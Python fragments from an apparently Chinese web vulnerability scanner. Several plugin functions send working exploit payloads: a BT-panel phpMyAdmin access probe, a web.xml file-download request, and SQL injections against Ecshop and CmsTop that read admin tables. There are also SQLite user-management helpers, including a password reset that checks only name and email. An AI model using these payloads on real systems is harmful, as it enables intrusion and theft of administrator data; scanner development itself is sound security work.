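    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    url = PortReplacement(url, 888)
    try:
        payload = '/pma/'
        payload_url = url + payload
        resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # All three strings must be present for the page to count as phpMyAdmin.
        if code == 200 and "phpMyAdmin" in con and "sql" in con and "New" in con:
            Medusa = "{}存在宝塔面板未授权访问phpMyAdmin数据库漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the response and the collected finding.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name or the
        # URL is None, which plain string concatenation would do.
        ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)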
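def __init__(self):
    """Open the database and make sure ``OriginalProxyData`` exists.

    Connects to the file returned by ``GetDatabaseFilePath().result()`` and
    keeps the connection in ``self.con`` and a cursor in ``self.cur``.
    """
    self.con = sqlite3.connect(GetDatabaseFilePath().result())
    # Cursor on the connection just opened.
    self.cur = self.con.cursor()
    try:
        # IF NOT EXISTS: a plain CREATE TABLE raises on every instantiation
        # after the first and fills the error log with an expected failure.
        self.cur.execute(
            "CREATE TABLE IF NOT EXISTS OriginalProxyData "
            "(rid INTEGER PRIMARY KEY, "
            "uid TEXT NOT NULL, "
            "oid TEXT NOT NULL, "
            "creation_time TEXT NOT NULL, "
            "url TEXT NOT NULL, "
            "request_headers TEXT NOT NULL, "
            "request_date TEXT NOT NULL, "
            "request_method TEXT NOT NULL, "
            "issue_task_status TEXT NOT NULL)")
    except Exception as e:
        ErrorLog().Write(
            "Web_WebClassCongregation_OriginalProxyData(class)_init(def)", e)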
def UpdateAvatar(self,**kwargs:str)->bool:
    """Store a new avatar path for a user.

    Keyword Args:
        uid: User whose row is updated.
        avatar: New avatar path.

    Returns:
        ``True`` when at least one row changed, ``False`` when none did,
        when an argument is missing, or when the update fails.
    """
    Uid = kwargs.get("uid")
    Avatar = kwargs.get("avatar")
    UpdateTime = str(int(time.time()))  # modification time, epoch seconds
    if Uid is None or Avatar is None:
        return False
    try:
        self.cur.execute("""UPDATE UserInfo SET avatar = ?, avatar_update_time = ? WHERE uid= ?""", (Avatar, UpdateTime, Uid,))
        # rowcount tells whether the UPDATE matched any row.
        changed = not (self.cur.rowcount < 1)
        self.con.commit()
        self.con.close()
        return changed
    except Exception as e:
        ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateImgPath(def)", e)
        return False
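def medusa(**kwargs)->None:
    """Check a target for the ``download.jsp`` file download issue.

    Requests ``/WEB-INF/web.xml`` through ``download.jsp`` and records a
    finding when the response is HTTP 200 and contains
    ``log4jConfigLocation``.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Headers sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
        payload_url = url + payload
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and 'log4jConfigLocation' in con:
            # NOTE(review): the full response body, i.e. the target's web.xml,
            # is stored with the finding.
            Medusa = "{}存在汇思软件任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the response and the collected finding.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name or the
        # URL is None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)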
def UpdateKey(self,**kwargs:str)->bool:
    """Store a new key for a user.

    Keyword Args:
        uid: User whose row is updated.
        key: New key value.

    Returns:
        ``True`` when at least one row changed, ``False`` when none did,
        when an argument is missing, or when the update fails.
    """
    Uid = kwargs.get("uid")
    Key = kwargs.get("key")
    UpdateTime = str(int(time.time()))  # modification time, epoch seconds
    if Uid is None or Key is None:
        return False
    try:
        self.cur.execute("""UPDATE UserInfo SET key = ? , key_update_time = ? WHERE uid= ?""", (Key, UpdateTime, Uid,))
        # rowcount tells whether the UPDATE matched any row.
        changed = not (self.cur.rowcount < 1)
        self.con.commit()
        self.con.close()
        return changed
    except Exception as e:
        ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateKey(def)", e)
        return False
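def medusa( **kwargs) -> None:
    """Check an Ecshop target through ``/ecshop/respond.php``.

    Sends one GET with a fixed query string and records a finding when the
    expected MD5 marker appears in the response text.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Headers sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,md5(c)) from ecs_admin_user limit 1))a from information_schema.tables group by a)b)"
        payload_url = url + payload
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if "4a8a08f09d37b73795649038408b5f33" in con:
            # NOTE(review): the stored response body may include a value read
            # from ecs_admin_user next to the marker; treat the result file
            # as sensitive.
            Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the response and the collected finding.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name or the
        # URL is None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)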
def UpdateToken(self,**kwargs:str)->bool:
    """Store a new token for the user with the given name.

    Keyword Args:
        name: User name whose row is updated.
        token: New token value.

    Returns:
        ``True`` when at least one row changed, ``False`` when none did,
        when an argument is missing, or when the update fails.
    """
    Name = kwargs.get("name")
    Token = kwargs.get("token")
    UpdateTime = str(int(time.time()))  # modification time, epoch seconds
    if Name is None or Token is None:
        return False
    try:
        self.cur.execute("""UPDATE UserInfo SET token = ? , token_update_time = ? WHERE name= ?""", (Token, UpdateTime, Name,))
        # rowcount tells whether the UPDATE matched any row.
        changed = not (self.cur.rowcount < 1)
        self.con.commit()
        self.con.close()
        return changed
    except Exception as e:
        ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateToken(def)", e)
        return False
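def __init__(self):
    """Open the database and make sure ``UserOperationLog`` exists.

    Connects to the file returned by ``GetDatabaseFilePath().result()`` and
    keeps the connection in ``self.con`` and a cursor in ``self.cur``.
    """
    self.con = sqlite3.connect(GetDatabaseFilePath().result())
    # Cursor on the connection just opened.
    self.cur = self.con.cursor()
    try:
        # IF NOT EXISTS: a plain CREATE TABLE raises on every instantiation
        # after the first and fills the error log with an expected failure.
        self.cur.execute(
            "CREATE TABLE IF NOT EXISTS UserOperationLog "
            "(id INTEGER PRIMARY KEY, "
            "uid TEXT NOT NULL, "
            "request_api TEXT NOT NULL, "
            "creation_time TEXT NOT NULL, "
            "header TEXT NOT NULL, "
            "request_ip TEXT NOT NULL, "
            "request_method TEXT NOT NULL, "
            "request_url TEXT NOT NULL, "
            "post_date TEXT NOT NULL)")
    except Exception as e:
        ErrorLog().Write(
            "Web_WebClassCongregation_UserOperationRecord(class)_init(def)", e)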
def ForgetPassword(self,**kwargs):
    """Set a new password for the user matching both name and e-mail.

    Keyword Args:
        name: User name to match.
        new_passwd: Value written to the ``passwd`` column as given.
        email: E-mail address to match.

    Returns:
        ``True`` when at least one row changed, ``False`` when none did or
        when the update fails.
    """
    # NOTE(review): the only checks visible here are that name and email
    # match a row. Confirm the caller verifies a reset code first and that
    # new_passwd is already hashed before it reaches this method.
    Name = kwargs.get("name")
    NewPasswd = kwargs.get("new_passwd")
    Email = kwargs.get("email")
    UpdateTime = str(int(time.time()))  # modification time, epoch seconds
    try:
        self.cur.execute("""UPDATE UserInfo SET passwd = ? , passwd_update_time = ? WHERE name= ? and email=?""", (NewPasswd, UpdateTime, Name, Email,))
        # rowcount tells whether the UPDATE matched any row.
        changed = not (self.cur.rowcount < 1)
        self.con.commit()
        self.con.close()
        return changed
    except Exception as e:
        ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_ForgetPassword(def)", e)
        return False
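def medusa(**kwargs)->None:
    """Check a CmsTop target through the vote ``contentid`` parameter.

    Sends one GET with a fixed query string and records a finding when the
    expected MD5 marker appears in the response text.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Headers sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#"
        payload_url = url + payload
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if '4a8a08f09d37b73795649038408b5f33' in con:
            Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand over the response and the collected finding.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write the result to a file named after the target.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() keeps the handler from raising when the plugin name or the
        # URL is None, which plain string concatenation would do.
        _l = ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)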
def Write(self,**kwargs):
    """Insert one row into ``ActiveScanList`` and return its row id.

    Keyword Args:
        uid: Owner of the scan.
        url: Target URL.
        proxy: Proxy setting stored with the scan.
        status: Scan status.
        module: Module name.
        process: Process value.

    Returns:
        The id of the inserted row, or ``None`` when the insert fails.
    """
    CreationTime = str(int(time.time()))  # creation time, epoch seconds
    fields = ("uid", "url", "proxy", "status", "module", "process")
    Uid, Url, Proxy, Status, Module, Process = (kwargs.get(k) for k in fields)
    # redis_id starts empty and is filled in by a later update.
    RedisId = ""
    try:
        row = (Uid, Url, CreationTime, Proxy, Status, Process, Module, RedisId,)
        self.cur.execute("INSERT INTO ActiveScanList(uid,url,creation_time,proxy,status,process,module,redis_id)\
        VALUES (?,?,?,?,?,?,?,?)", row)
        # lastrowid is the primary key of the row just inserted.
        GetActiveScanId = self.cur.lastrowid
        self.con.commit()
        self.con.close()
        return GetActiveScanId
    except Exception as e:
        ErrorLog().Write("Web_WebClassCongregation_ActiveScanList(class)_Write(def)", e)
        return None